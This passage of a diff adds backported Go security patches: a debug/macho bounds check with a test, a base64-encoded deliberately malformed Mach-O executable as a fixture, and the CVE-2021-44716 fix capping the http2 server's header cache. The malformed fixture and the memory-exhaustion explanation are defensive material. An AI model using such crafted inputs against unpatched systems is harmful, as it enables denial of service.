++ return nil, &FormatError{offset, fmt.Sprintf(
++ "number of undefined symbols after index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++ hdr.Iundefsym+hdr.Nundefsym, len(f.Symtab.Syms)), nil}
++ }
+ dat := make([]byte, hdr.Nindirectsyms*4)
+ if _, err := r.ReadAt(dat, int64(hdr.Indirectsymoff)); err != nil {
+ return nil, err
+diff --git a/src/debug/macho/file_test.go b/src/debug/macho/file_test.go
+index 03915c86e23d9..9beeb80dd27c1 100644
+--- a/src/debug/macho/file_test.go
++++ b/src/debug/macho/file_test.go
+@@ -416,3 +416,10 @@ func TestTypeString(t *testing.T) {
+ t.Errorf("got %v, want %v", TypeExec.GoString(), "macho.Exec")
+ }
+ }
++
++func TestOpenBadDysymCmd(t *testing.T) {
++ _, err := openObscured("testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64")
++ if err == nil {
++ t.Fatal("openObscured did not fail when opening a file with an invalid dynamic symbol table command")
++ }
++}
+diff --git a/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+new file mode 100644
+index 0000000000000..8e0436639c109
+--- /dev/null
++++ b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+@@ -0,0 +1 @@
++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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqAEiJ5UiD5PBIi30ISI11EIn6g8IBweIDSAHySInR6wRIg8EISIM5AHX2SIPBCOgiAAAAicfoMgAAAPRBU0yNHafw//9BU/8lvwAAAA8fAP8lvgAAAFVIieVIjT0zAAAA6A0AAAC4AAAAAMnD/yXRAAAA/yXTAAAAAAAATI0dwQAAAOm0////TI0dvQAAAOmo////aGVsbG8sIHdvcmxkAAAAABQAAAAAAAAAAXpSAAF4EAEQDAcIkAEAACwAAAAcAAAAkv////////8XAAAAAAAAAAAEAQAAAA4QhgIEAwAAAA0GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDAX/9/AAAIEMBf/38AAAAAAAABAAAAGBAAAAEAAAAQEAAAAQAAAAgQAAABAAAAABAAAAEAAACQDwAAAQAAAJwPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAHgEAAFAPAAABAAAAGwAAAB4BAABkDwAAAQAAAC4AAAAPBgAAGBAAAAEAAAA2AAAADwYAABAQAAABAAAAPgAAAA8GAAAAEAAAAQAAAEoAAAADABAAAAAAAAEAAABeAAAADwYAAAgQAAABAAAAZwAAAA8BAABqDwAAAQAAAG0AAAAPAQAAFA8AAAEAAABzAAAAAQABAgAAAAAAAAAAeQAAAAEAAQIAAAAAAAAAAAkAAAAKAAAACQAAAAoAAAAgAGR5bGRfc3R1Yl9iaW5kaW5nX2hlbHBlcgBfX2R5bGRfZnVuY19sb29rdXAAX05YQXJnYwBfTlhBcmd2AF9fX3Byb2duYW1lAF9fbWhfZXhlY3V0ZV9oZWFkZXIAX2Vudmlyb24AX21haW4Ac3RhcnQAX2V4aXQAX3B1dHMAAA==
+\ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
new file mode 100644
index 0000000000..9c4fee2db4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
@@ -0,0 +1,93 @@
+From 9f1860075990e7bf908ca7cc329d1d3ef91741c8 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 9 Dec 2021 06:13:31 -0500
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d0aebe3e74fe14799f97ddd3f01129697c6a290a]
+CVE: CVE-2021-44716
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Pull in security fix
+
+ a5309b3 http2: cap the size of the server's canonical header cache
+
+Updates #50058
+Fixes CVE-2021-44716
+
+Change-Id: Ifdd13f97fce168de5fb4b2e74ef2060d059800b9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370575
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+(cherry picked from commit d0aebe3e74fe14799f97ddd3f01129697c6a290a)
+---
+ src/go.mod | 2 +-
+ src/go.sum | 4 ++--
+ src/net/http/h2_bundle.go | 10 +++++++++-
+ src/vendor/modules.txt | 2 +-
+ 4 files changed, 13 insertions(+), 5 deletions(-)
+
+diff --git a/src/go.mod b/src/go.mod
+index ec6bd98..56f2fbb 100644
+--- a/src/go.mod
++++ b/src/go.mod
+@@ -4,7 +4,7 @@ go 1.14
+
+ require (
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d
+- golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++ golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf // indirect
+ golang.org/x/text v0.3.3-0.20191031172631-4b67af870c6f // indirect
+ )
+diff --git a/src/go.sum b/src/go.sum
+index 171e083..1ceba05 100644
+--- a/src/go.sum
++++ b/src/go.sum
+@@ -2,8 +2,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d h1:9FCpayM9Egr1baVnV1SX0H87m+XB0B8S0hAMi99X/3U=
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
+ golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057 h1:HThQeV5c0Ab/Puir+q6mC97b7+3dfZdsLWMLoBrzo68=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
++golang.org/x/net v0.0.0-20211209100217-a5309b321dca h1:UmeWAm8AwB6NA/e4FSaGlK1EKTLXKX3utx4Si+6kfPg=
++golang.org/x/net v0.0.0-20211209100217-a5309b321dca/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+ golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+ golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+ golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf h1:+4j7oujXP478CVb/AFvHJmVX5+Pczx2NGts5yirA0oY=
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 702fd5a..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4293,7 +4293,15 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.canonHeader = make(map[string]string)
+ }
+ cv = CanonicalHeaderKey(v)
+- sc.canonHeader[v] = cv
++ // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
++ // entries in the canonHeader cache. This should be larger than the number
++ // of unique, uncommon header keys likely to be sent by the peer, while not
++ // so high as to permit unreaasonable memory usage if the peer sends an unbounded
++ // number of unique header keys.
++ const maxCachedCanonicalHeaders = 32
++ if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++ sc.canonHeader[v] = cv
++ }
+ return cv
+ }
+
+diff --git a/src/vendor/modules.txt b/src/vendor/modules.txt
+index 669bd9b..1d67183 100644
+--- a/src/vendor/modules.txt
++++ b/src/vendor/modules.txt
+@@ -8,7 +8,7 @@ golang.org/x/crypto/curve25519
+ golang.org/x/crypto/hkdf
+ golang.org/x/crypto/internal/subtle
+ golang.org/x/crypto/poly1305
+-# golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++# golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ ## explicit
+ golang.org/x/net/dns/dnsmessage
+ golang.org/x/net/http/httpguts
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
new file mode 100644
index 0000000000..17cac7a5ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
@@ -0,0 +1,83 @@
+From 9171c664e7af479aa26bc72f2e7cf4e69d8e0a6f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 10:22:47 +0530
+Subject: [PATCH] CVE-2021-44717
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/44a3fb49]
+CVE: CVE-2021-44717
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
